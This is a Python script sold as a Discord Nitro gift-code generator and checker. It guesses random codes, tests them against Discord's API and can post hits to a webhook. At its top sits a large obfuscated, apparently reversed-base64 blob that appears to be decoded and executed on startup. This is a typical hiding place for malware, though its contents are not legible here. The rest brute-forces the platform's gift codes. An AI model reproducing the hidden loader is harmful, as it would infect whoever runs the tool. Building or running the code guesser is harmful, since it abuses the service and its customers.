cUVVOTV2a1YVYGZ1UZhlQXVFM4dnYGplRStmWVRlVJdXVsZVYSxGZRFlaG9UUxolcWtGaPJlVWR1UqJ0TT5GayZFVGJnVVVTYhdEeSRFRVdnVrp0ThFjS1IFVCdlVFp0cVZlQHZlVKxUVqJUVWZlSGZlVstWZsJFVaVkUXV1aJhnVGp0chFTS3lleGZlVYF0dWhFcOZlROV1UrpFWS1GazZlRO9UTWpkUkdEdSJFbaVEVqJkSNZkSZV1aWZ1VXhmVVxmUrJFbat0TXR3TUZkWFZFM4NnVspkUjZkWSJ1R4dVVWR2diVUMINmRWhlV6t2dUxWT1EGM1c0UrJ1TNZlRyVFM0FWYrRTeUZlWSNVV1EHVq5kTlxmV1clVSd1VFVjNU1mRzJlVKJlWEJkUVxmWyVFM4dUYwUjWaZkVTJlRKdVVx8WMNZkUNNFbSZFVGBnNVBzc41kROVTVWZ1UUNjQXZFMstkVG1kePVkVPRVbndXVWpVYSVVNENmRWV1UygmRWFjSXZVR1U1YGplVSBTNxZVRsNVYxI1QX1GeVN1VoZkVFJ1dWZlWZVmRWh1Urp1cVFDZrJlVNhXWwY1TTFDcVZFM5skVVVDaUtmVY1UbOFHVWR2SSZ0Y4VFVGJVZWx2VWVkShZlVGhVZEJ0VU1GeyVFbGtmVsZ0RNdFdTZ1awVVVs50RNVVMGV2R0NVVFp1RWxGZTZlVSh2VqZ0TVtmWGVFMsNlVGRGRStmWWV1aaZFVrZ1TWxmToJVb0JVTX50RWhEcCZFbZhXVXh3TX1mUGZFVGpkUsp0RVxmUYJlaGZlVVR2aWVVNXZ1aS9EVwUTVWBTOHJFbOVVVrJFWUdFaXVVMONkUsZVRXxmWPZFWndHVrh3ThtWMDN1aSZVZrV1dUhFbWJFbW5UVsJ1VSFzb3VlVktUTWZETWpmQTR1VSVVVVBXYSxGZhN1aWVVUthncWxWUx0kROpUVtB3TXVFcFZFSwJVTFVDRS1GdWlVV1YlVWJ1RhBTMDNWRWd1UFBXVUx2a41kROZ1VtB3VRxmWFZFbwFWYxQmShRkQWdlRKJnVWJ1SlxmVVNWRWZ1UsB3cUxmThZFbKVTYygXVWxmWVVVMG9kYG50SU1GcYd1aKdlVGp0ahBTMVNlaC9UVVp1RWFDbLJmRalkVqZkVSFjSyZVROdlVsZlTaZkWSZlRwJXVUJkWNZVR4lVMW9EVtJ1cWRkQK1kVaBlYFZ1VTVlWyVFMk9WYwUzRhdEeSZ1a1EnVsp0RWZlWQ5UVWNVUsp1VVVFcLJlVktUUsp1VSJzZ4VVV3hnUWJVSjRkQV1kM0ZlVFxGMNZkToJFba9kUYFEeVBjVL1kVSVkVsJVVl1GO3ZlRo9UYsZUUV1GdSRFbwVlVw40bNZlRPF2R4VlVwkEeWtGdXJlVWh0TXRHWXZlWzRFVKplVWpERVxmWXRlVaNnVrR3dhFTT5lVMSNlUUZkcV1mRXJlVWp0VqZkTTBjWzRVVSNnUsJFROVlVPJlVwZkVEpkWhFjUPJGRCdlUEZlcVpXS00kRKNkUsZFVURFbyRFbo9UYsp0TTtmVUN1a0cnVE5kdiZkVTR1aWRlUFl1dWtWNrVGbWRVUrplVWtGN4Z1aOtWYsp0TiVkWUJVMaFnVG50bWZFZTZFbad1VWpkRVxGcXZFbWV0UrZ1URNDaWVFMktmVGlEehpnRTNFWCZFVr50TWxWR4dlVSJVTxYlNWhFcW1kVK90TVZlVWBjWzZFWspVTWJlVS1GdTZ1a1YUVwEzTWxmVN9UVWVVVrB3VWpmSqFGbaxEZHRnUVBjWWV1asNXTWllekFjVXdFbwZjVEZkahxmTNFmRWRVZWxmcWZEc3FWMRpXWxYlVNJjTHZFMzVjVWV0djJDdPZFbaFHVVR3dWZlRFd1aahVVr92dUxGa31kVOJlVqJ0TRxmSzZFROZnVspkVV1GcVFFbaZkVGZENSZlTLR2R0hVVtJ1VVBDcLZlRWN0UtBHVTBjWWVFWwZnUVVTUTpmRTZ1RoJnVUlENhFjS1EFVGRlVrB3VUpWR00kRKhWVtRnVUVFcVVlbspWTGlkeNdEdWZVVadVVuxmVhFjSKRGRC9kVxoUcVVlU0YVV1kFVqJkTUFjS2UFMo9UZs5UTUtmVVJVboNnVrh2VWZlUMZlaGNVVzI0VVBjS3JFbOtkUspFVNVlVyZFbaNVYxoVSVtmVPRVRwVkVxI0aSZkVO1kVWZVZqJkcVpXQ31kRJhXVWZVVSBDcWR1aoNlVW50QldEdWJ1RodEVqJkTWZkRIVWRW9UWVplcVxmUz1kVGdlYGZVVldVT3V1asNlUWZVNZFjUPdFbwVUVwg3VWZlVLFGRCVFV6ZkRWFzY41URxQVYFpFWSZkWVVlVOdUYxo1QhZkWXFFMadkVr50ViVUNSV1aaZVVHhnRWBTOXJlVOZkUsZVVU1GeyRlVs9kVsNmeaJDeWdlVKdkVqZkeWZlRIJ1aaRVZVFjcWBjWhV2axQVVuB3TTJjUGZlbwZkUsJFRiRkQSd1awVlVrFTYWxmTaFWRa9kVsp0cUxWQ4FWMWNFVsJlUlZVR3ZVRaFmUVVjWUtmUWR1avhnVsB3QNVVMaVlaC5kUyg3VUxGZzZFbK90UqJ0VU5GayVlVnVjVVVjSlRkQXJVVvhnVqJkTWxmT2QlVadVUrp1VVpnQa1UV1MVVsZFVU1WU4VFbadlUWZFRadEdXZlRwZkVFx2bWZFZNNGRCJVTqF0dWZEbvZlVah2YFZlVTxGcWVlbwZVYxQWSjZkWUV1VSFnVVZ1ShFjU1EVVaVlVGp1cWxmTh1URxQkVqJkUV1GeyZVRwgnVVRjeRVlWTV1RRhHVWp1UWZlTIRFbadVVud2dWxGaXFGbGlkVqJEVVtmWGZFMRFjVVVDUaRkQTZVVwFXVuBnTSZkWPZ1aaNVTrZlRWxmUhJmRGxkYEJ0USBDcyRFbONlUGZ1RVxmUXdVR1UkVGZ1SWZlSI5kVWJ1UuJ0cVVFePZlVWVlYGZFWVZkSVZVVktkVsplUidEdVRFbKdlVGJVYWZkTPV1aaNVTzM2dWxmRPFGM1M1YEJ0TWZkSVZVMsdlVslUeWZlUSdFRWZEVrJ1biZkTIplRWVlUqV1dVFjSH1UR1MkVsJlURtGcGZlaGNjVWpkWT1GcWlFWSZlVVlUMhFjVE9kVWJVWVVjNWRlTWFGMwkXY6ZUVSdFeyVFVKpWTFVjRV1GdYdFbvdXVVFzVWZlVZRlaGVVVWp1cUhFbKJFbK1kYEJUVlZFbzVleCJXYwQTeVdFeXdFSRdnVGp0biVUMQd1aSh1VrB3VWBDa3ZFbOFGVqZkVSp3a3VlbrBTYxYERNdFdSF1MSZVVU5kSiVEN4NmM0VVTqJlVVtmWTZlRkVUYHh3USxmWXZFSwZkYFVTWUpmRPVVb4NXVVh2SSxmWDdVbwRFVtJVcVFjSrZFbG1kWFZFWXVVNXR1aOtkUsplSTxmWW1URFhnVFZ1bNZkRFNlaGRVUsp1RWxGZrJlVkh2Urp1UXVEcyZFbS9kUFVzTTtmUVV2axEnVwQ3UNZlVIVlaC5UUs92dWZEaTFWMWNkVrJlVSZkSFR1asdUYxoUWadEcUVVRadlVwo0UhFjUENGRGRVVyg3VWtGdH1kVG9kUthnTNZlRzZ1MwpUZs50QUxmVXNFSCdUVxo1TNZkSFFGRGZlUIJkcWVlVTV2axQ0UqJ0TWdEazZ1aodVYwUDUU1GcTdlRwFXVWJ1VSZkSWp1R4hlVVp0cWFjQX1kRGNVUqZkUNREaGZFRNRTYxo1RjdEePRVMadFVrB3dWtWNKRVbw5kUyI1RUtGaXZVR0gnVXBnVR1mUGR1a5ckYFBDeWRlQWZFRWZUVsp0bhFjUWJ2R0NVWVl1dVpnQyZVV1EmWGZVVVhkUyZVV0dnVWplSRpmRONFWBhXVu9GNhFjVGVFbSVVWVB3VWRlTCJFbOpkYGpFWSBjWzZFbC9kUsZVTW5GcOFFbadkVwg3VhFDZTJVb4hlVWB3RVtmWTJmRNlnUUJ0UVd0Z4VFM18mYGpVWaVkVVJ1a1YkVwUzdiVUMLdFbWZVUygmcWRkSWF2a1QVTVZ1TVpWV3VleOJlVFVzTaRkRVZFWBhXVx40VhxWU3VlVS9UZVxmVUpmRKZFbJpHVWZ1TVVEczZFWsZnUWRWNhFjWSV2VOVkVXVUNWZlWW9EVC90VqxmVWtWNPF2a1AVYHhnTSVlWzZ1asdXTGZFWRpmRORlMSZUVrR3VNZkSIRlaCZ1UVlEeUZlSHFWMKRUVqZkVSdkUVV1aadlUsJFTiZkVSV1aZhHVsR2UWZkRYdVb0J1UHh2VU5GcyJFbO9kVsp1UUdEezZlVFFjUW5UWkdEdUJVVaJXVwA3UlxWV5JVVaRlVthncWxmSLJlVkR0UsplVWtGczRlVWNVYxQ2TWxmWX1kRGZkVWR2biZkWJJWRWR1VsplcVRlSuZlVKd0UsJFWZdlUHZFRGZlYFVjVS1GeOV1aaZlVwEzUSVVNoF2R450UzEEeUZlVXZlVGZTVVZFWUtGcyZVbG9mUWZFTaVkVPZFRGJXVsZ1RhFjWTp1R0RVTVVEeUZlQzFWMWVFVrJVVVR1a3VVMw9mVVVjWORlQVdVR0gnVVx2TNZlTNN2R4hVTFVEeVRlTG1kRWlkWEJkUUVFcFVleKpVYsR2TTxmVYRVR1MXVxo0UhxmRUpFRCd1UWp1cWZEchFGbap0UqZ0TSBDcVVFbaNlVFVTNTdFeSVlRaVFVs50ahxmUJJVb49EVsBXcWtmSX1kVON0VqZkUNJTT4ZVRodkUWFFeiFjVTZFSSZlVxo0aiZkR2Y1VwhFVwo0cVpmQW1UR10kUtRnTUh0Z3RVVs9kVGplUU1GcUJFbKJnVzwmcSxWU6plM0JVZrxWVWhFbqFWMNdXVXhnUSVEcGZlRFFjVVRDeWZlVWRVVZdnVVB3RNZUS4FmM4RVVExmVVtGZXJlRRpXW6JkUlV1a3VFMvhnUW5kTWxmUSVlVvdXVxY1SWVUNIFmRWhVVslEeWZlU3JlVSNlWFJ1TXpmRyVlVotmUspVSiZkWXNlRvhHVVp1cNZkRZ50V0NFVIhmcUxGarFWMSt0VrZ1VlpWU3ZFSspVYrFjUXxmUU1UVxYkVUpkahBTM2ImM4NVVwAXcWVlTPZFbVdnVXhHVWFDczZleC5kUsplVhVkVT1UbzdXVwI1ahxGZapVRadVVxo1VWVVNwYlVGx0VrpFVUFjSGRFbO9WTG5URTtmWW1UVsJHVVB3VWxmVVdVbwJFVHh2VWVlTrF2a1E1VuB3TWpnVGVFMSRjUWJVVkZkVX1EbGJnVWZ0TWZkRQZ1aaZ1UXJVRWFDarZlRGlUVsZ1Ul12c4VFM0dkYGp0TSxmVVNFbvhHVVZ1dhFjVKFmRWdlVWBncWVEehFWMal0YFZVVVJDaXZ1a0gXYxIVUWpmQXN1V3hXVsp1RSxmTN5UVW9kVUxmRWdkRv1kRaZUVth3VVdEeWR1asNlUspETaZkVPZVb3hXVsJEMhFjWVdlbw90Vsl1dUtmTPJlRSZzYxYFWTxmWWR1axMlUWpEVUxmWVVlRadlVs5ENWZlSGVVbwd1VIJlcWRlSSJmRGt0VrZ1TTtWN2UFbO9WTGp0QUxmUWdlRwZEVrVzRWZlV1YlVSVlVrB3cUtGd0YlVSRVYFpFVV1mUVVVVxsmVWp0SX1GdOVWbjdXVWtGeNVUNWVlbwV1UIhmRUxWT41URxMUYEZ0UWVUNGZFboBTYwEDVVtmUWd1VSZDVVNWNhFjSUJlaCR1VXh2RWFjRHJmRkNlUth3TRxmW2YFbvFTYwEzTTxmVTNVbndXVVZ1UiZkUEZ1aaVlUWpUcVpnQSZFbaJ1UthHVlxmVWR1aJVjVWNGeiJDdPJ1VodVVsJENWZlREdVb0ZlVIF1dVZlVvFWMWhFVrJ1VNVkVGZVR4tmUGRmUTxmWU1UbOdkVxo0VSZlWWRlaCdVVsplcVVFa3JFbWZjTEJkUW52Z3RFbwtmVsR2VUpmQPlVVKdVVV50aNZkRIFmRWJlVxAXVVFTU4ZlVjlHZxYlUWVVNHZ1aK9kVsJVUTxmWSJVR1clVyY0UNZkTWZ1aSZlUYJkRWdkRhZlVjhnUXhnTNZlRzZFVNBTYxYVYPZlVWJ1MCNnVFx2bStWNTJVb4VFVXhmcWBjULFGMwcHVXR3TNVFM3ZlROFWYxo1RTtmVXJFMKdkVFNHeWVVNJNFba9UUtJlRVxmVLZVV1Y1UsJ1TUZkWWZlRO9mUsJFUUxmWPZlVwVEVqJkTWxmUEV1aaZlVEZkVVBjVhJlRWhmWGZlVSZlSXR1aVVTTGpkTiZkVXdVRwJnVsh2bNZkURV1aaVlUxo1RU1mR0IVV1gkUsplUSZEcWVVMSdUTVVjRVtmUUNVMwVUVxEUMSZlSWdFbWZ1UWp0VWRkQy1UR1UUTWZVVXZUW4ZlbwZVZrFzRXxmVYRlRaJXVsZ1TWZlVVp1R4hVVXh3cUZlQrZlVW9UVthHWNVEbFVVMwNnUWRWRUtmWTZlesZlVWVVMSZlShNGRCNVVrplcWZEZT1UVxUzYyQnUlVFM4ZFVCpUTVVjWX1GcS1URsZUVslUMhFjSRplRWVlVyIlRW5GcWZlVG10YEZ0TUxmWzVFMOtkUG5kSUpmRSVFMKNHVWh2aSxmULdVb0J1VVVTVWVVM3ZlVGV0YFZ1UWVlWWZ1aSFWYs5UUV1GdUNFWBdnVsp1ahxmSYRFbW9UUygnVVpmQCZFbWFmUqJEVTV0b3VlVGFmYGZEaidEdTVFSCdUVwI1RNVVMWZlaGNFVs9GeVBjTTZlVOpVVuBnTSNjUGVFMadUTGJVRjdEePdVVaJnVV50QWxmWWR1aWVlVrl1dVV1bxYlVZpHZyQ3TlVFbFZVRSRjUW50SaZkVSR1a1YFVrB3ShBTNVR1aaN1UspVcWxGbzZFbGtkUqJ0TTFjSxRFVKplUGJlRidEdTd1a0cHVWpUYWZlRM90V0ZlV6xmRWVkWTZFbKdkVsJFVWxmSFZ1ajFjUW10daBjVYJFSndHVrRXYWxmVZZVbwRVTHRnVVVlSPZlVGp0TUJUVWtmSzRFbOdUTGplNSdFeYFVMKZDVWZ0altWNEVFbWNFVygncUxmU31kVOdlYEJkTSd1d4RVVwUTYx4EViVkVWN1RSVlVE5keSVVNopFSwJlVwo1VWtWMvZFbWVlWFZFVVpWV3ZVR4tWZslFehBjVTRVbSZTVVR3TSxmTIpFSwRVVyg2RWVkTTJlVO5kYFZ1UXZFcxV1MvRTYwEjRT1GeOZFbKFXVtZENWZFZSJWRWVVTFBzdWxmSXJFbJl3UVZ1TUdkUWVlVaFmVsZ0VR1GeUVlVaJXVrFzchFjTaN1aSZ1UGp1RVtmWPJVR1EmYEZ0Vl5mTyV1MvBjUVVDUXpmQSJFbZdnVVx2bNZlUJNVb4ZVUxA3RWVkWPJmRGp1UqJkUVRlRWVFMOdUTVFDaSpmRUF1aZdHVWJ0cNVUNSR1aWV1VEZlVWBDeXVGbK9kYFpFVXxmWzVlaKpXTGpkUhVkWWVlRaNXVxo0RSxmW1QlVaR1UUV1dUxmUTV2a1kEVrZVVNxmVyZ1akFWYxYUYTxmUPZVMwVFVqZkUWZkRYFWRadVWXJVcUZlTz1kRSZTUVp1UR5mQyZFM1sWYxQGUjVkWUVVboZUVxA3TNZkVIdVbw5kUtF1dVBjUrJmRaF2VsplUXREbGZFVOZUYwEzQT1GcS10RzhnVEpkVWxmV1k1MwVlUGp1RVFjRPJVV0k3UYBnTUx2b4ZFVCplYFRTeWdFeP1URFhXVr50aWxmRDpVRSNVUxokVVxGbhJWR1Y0VthXVSdEaHZFRK5kUWJFaadEdWNlVwVkVq5kchBTMKp1R0dVVFRzdVVlSrZlVSVUUthHVltWMFZlVWNlUsFVeUhFcXJ1VSZEVrBTMhFjWKZVb4Z1Vsl1dVVlWLJWRxgVYFZFVWBTNFVVMsRTYwEDaStmWXRVR1clVxg2RWZlUIVlaGJ1VtJVRWtWNXJmROplTUJUVSxGcGZlVK9WTW5kVSpmRUNlardHVsp0alxmRYRmRWZ1VXhmcWtGarJFbkN0UtR3UTFzb4VFVJBjUWlkejFjVUF1aaJnV6pkaWZUT5RFWw50UrVTVWxGczJmRNhnUWZFWUtmSXVleGZkVspUWU1GdWZVRZdnVGJ0aSZlTDd1aaZ1VXh3RVBTOvJlVkhkUrZVVVVFcXZ1a0NVYspFSWpmRSVVVaZEVspUYWZUV45URWVVVthncUZlWvZVV0gnVUZEVVFDcVVFMwtmVspETkVkVTd1a1MXVxY0bWZlTa9kVWN1VqxmVWV0b1EGMxklWFZVVZdFeyVlaO5WYxYkShdEeUNlerdHVrR2SSZEZLRFbWVlV6xmcWRkTWV2a1YkWEJkVSZkWFVFMKFWTWp1SS1GdWRVRaZkVIBnchFjSQJ2R0V1UtJ1cVV1cxIlVahWYFZFWSJDezZVROdkVrVDUPRlQPNFVGZVVYtGNWZlRWNVbwVVZWxmcVVlS31kRaxkVsJFWURFbWZFSsZlVGJFRkdEdPNVV1YjVsB3TWZkSRd1aW9UVFl1dVZlSTZlVW9UTWZlVNxmVGZFbK9UTGp1UX1GeVFlaGZlVr50SWZkUXJmRWZlVxo1VVJjR31UR0knTEJ0TWtWNWVlVSFmVs5UTVtmWP1UbOJHVVR3dNZlURdVbw9UZWx2VU1WR10kRKhGVuB3UVVEcxZFWsJVTWZ0RPdFdPNVVZhXVWFUMNZkWTJWRaR1UzIlcUZlSPFWMWVTW6Z0TVFDc2QVV1MkUs5UYX1GeXVFbKZVVVlzbiZUV3VFVG9EVtFFeVxmQXZlVWR1UqZkVVt2b3VlaGJnUslkeXRlRWJFWSJnVwI1bNZkSWVVbwR1VWB3cWNDcOJmRSZEVrZlVWxGcVVFbsFWYspVYTxmVVZFbJhHVuBnWltWMSdVbwd1UFB3cVVlTLJVR10EVtB3USVVNzRVV1cVZspkSjRkQWRlMSZlVWZ0TSxmSWdFbWRVTy4UVWtmSTZFbkN0VrJFVVRkRWVFMO9WYxY1QPZlVUF1aKdEVsp0aSZFZWp1RwhlVGp1cWpnTWV2a1AlWHR3TSZFcWZFMwFWYxoFRiRkQOVlVaFnVrR2TNZlWQRFbahVTWtGeWxmTLJlRNpXVVJlVURkRWZlRSNVTWlFeaJDeWd1V4dVVU1EMSZlTYJGRCR1UzIkRWBDZPZlRkhFVrJFWUxGcVZVbFhXYxYESadEdYRlasZFVtZUYNZkRoR2R0d1UWBXRUxmQv1UVwoXWxIlVVRFbyVFWsZkUWNmeSZlVRJ2ash0UzEENStGd2RlVkFmTGlVeUNjQyVVMoRTTHxGUO5WT4d1Ra9WVxAncPRlSaJmRKRHVYBnSiVFe3lFMO9UTsVVeZJDaL10awZ3TEZUWNV0b6llbjhnVyYUbPVlWMV2a1k1Vux2QXdkSyQFbkFWY6ZFVTJTNKZlMGp3YE50Sip3Z4dFRCtUTyo0MNZFZoplasd0UUplQlZFatFFbOpVYwAHWZ1Ga0IFMrVTUYxWWKl3awdiYokyXogyYlhXZ'))

        print(f"""{Fore.RED + Style.BRIGHT}
██████╗░██╗░██████╗░█████╗░░█████╗░██████╗░██████╗░  ███╗░░██╗██╗████████╗██████╗░░█████╗░
██╔══██╗██║██╔════╝██╔══██╗██╔══██╗██╔══██╗██╔══██╗  ████╗░██║██║╚══██╔══╝██╔══██╗██╔══██╗
██║░░██║██║╚█████╗░██║░░╚═╝██║░░██║██████╔╝██║░░██║  ██╔██╗██║██║░░░██║░░░██████╔╝██║░░██║
██║░░██║██║░╚═══██╗██║░░██╗██║░░██║██╔══██╗██║░░██║  ██║╚████║██║░░░██║░░░██╔══██╗██║░░██║
██████╔╝██║██████╔╝╚█████╔╝╚█████╔╝██║░░██║██████╔╝  ██║░╚███║██║░░░██║░░░██║░░██║╚█████╔╝
╚═════╝░╚═╝╚═════╝░░╚════╝░░╚════╝░╚═╝░░╚═╝╚═════╝░  ╚═╝░░╚══╝╚═╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░{Fore.RESET}""")
        self.slowType(f"{Fore.LIGHTYELLOW_EX}Generator and Checker!{Fore.RESET}", .01)
        time.sleep(0.5)
        self.slowType(f"{Fore.LIGHTBLUE_EX}Developed by: b4db0y01{Fore.RESET}\n", .01)
        time.sleep(0.4)
        self.slowType(f"{Fore.LIGHTRED_EX}\nHow Many Codes? \n[>] {Fore.RESET}", .01, newLine = False)

        num = int(input(''))
        self.slowType(f"{Fore.LIGHTYELLOW_EX}Enter a Discord Webhook link or press Enter to Ignore. \n[>] {Fore.RESET}", .01, newLine = False)
        url = input('')
        webhook = url if url != "" else None
        sleep(0.5)
        print(f"{Fore.LIGHTYELLOW_EX}{Style.BRIGHT}------------------------------------------------------------------------------------------------------------------------\n")


        valid = []
        invalid = 0

        for i in range(num):
            try:
                code = "".join(random.choices(
                    string.ascii_uppercase + string.digits + string.ascii_lowercase,
                    k = 16
                ))
                url = f"https://discord.gift/{code}"

                result = self.quickChecker(url, webhook)

                if result:
                    valid.append(url)
                else:
                    invalid += 1
            except Exception as e:
                print(f" Error: {url} ")

            if os.name == "nt":
                ctypes.windll.kernel32.SetConsoleTitleW(f"Discord Nitro Generator & Checker! | {len(valid)} Valid Nitro Codes Found | {invalid} Invalid Nitro Codes Found | RUNNING GENERATOR / CHECKER | Developed by b4db0y01")
                print("")
            else:
                print(f'\33]0;Discord Nitro Generator & Checker! - {len(valid)} Valid Nitro Codes Found | {invalid} Invalid Nitro Codes Found | RUNNING GENERATOR / CHECKER - Developed by b4db0y01\a', end='', flush=True)

        print(f"""
{Fore.LIGHTYELLOW_EX}{Style.BRIGHT}------------------------------------------------------------------------------------------------------------------------
{Fore.LIGHTYELLOW_EX}Results:
{Fore.LIGHTGREEN_EX}Valid:{Fore.RESET} {len(valid)}
{Fore.RESET}{Fore.LIGHTRED_EX}Invalid:{Fore.RESET} {invalid}
{Fore.LIGHTGREEN_EX}Valid Nitro Codes:{Fore.RESET} {', '.join(valid )}{Fore.RESET}""")
        ctypes.windll.kernel32.SetConsoleTitleW(f"Discord Nitro Generator & Checker! | {len(valid)} Valid Nitro Codes Found | {invalid} Invalid Nitro Codes Found | STOPPED GENERATOR / CHECKER | Developed by b4db0y01")

        input(f"{Fore.WHITE}\nPress Enter to Exit!")


    def slowType(self, text, speed, newLine = True):
        for i in text:
            print(i, end = "", flush = True)
            time.sleep(speed)
        if newLine:
            print()

    def generator(self, amount):
        with open(self.fileName, "w", encoding="utf-8") as file:
            print("Wait, Generating for you")

            start = time.time()

            for i in range(amount):
                code = "".join(random.choices(
                    string.ascii_uppercase + string.digits + string.ascii_lowercase,
                    k = 16
                ))

                file.write(f"https://discord.gift/{code}\n")

            print(f"Generated {amount} codes! | Amount of Time it Took: {round(time.time() - start, 5)}s\n") #

    def fileChecker(self, notify = None):
        valid = []
        invalid = 0
        with open(self.fileName, "r", encoding="utf-8") as file:
            for line in file.readlines():
                nitro = line.strip("\n")

                url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"

                response = requests.get(url)

                if response.status_code == 200:
                    print(f"{Fore.WHITE}[{Fore.GREEN}!{Fore.WHITE}] {Fore.GREEN}Valid {Fore.LIGHTYELLOW_EX}|{Fore.RESET} {nitro} ")
                    valid.append(nitro)

                    if notify is not None:
                        DiscordWebhook(
                            url = notify,
                            content = f"**Valid Nito Code detected!** @everyone \n{nitro}"
                        ).execute()
                    else:
                        break

                else:
                    print(f"{Fore.WHITE}[{Fore.RED}!{Fore.WHITE}] {Fore.RED}Invalid {Fore.LIGHTYELLOW_EX}|{Fore.RESET} {nitro} ")
                    invalid += 1

        return {f"{Fore.LIGHTGREEN_EX}valid" : valid, f"{Fore.RED}invalid" : invalid}

    def quickChecker(self, nitro, notify = None):
        url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
        response = requests.get(url)

        if response.status_code == 200:
            print(f"{Fore.WHITE}[{Fore.GREEN}!{Fore.WHITE}] {Fore.GREEN}Valid | {nitro} ", flush=True, end="" if os.name == 'nt' else "\n")
            with open("Nitro Codes - Developed by b4db0y01.txt", "w") as file:
                file.write(nitro)

            if notify is not None:
                DiscordWebhook(
                    url = notify,
                    content = f"**Valid Nito Code detected!** @everyone \n{nitro}"
                ).execute()

            return True

        else:
            print(f"{Fore.WHITE}[{Fore.RED}!{Fore.WHITE}] {Fore.RED}Invalid {Fore.LIGHTYELLOW_EX}|{Fore.RESET} {nitro} ", flush=True, end="" if os.name == 'nt' else "\n")
            return False

if __name__ == '__main__':
    Gen = NitroGen()
    Gen.main()
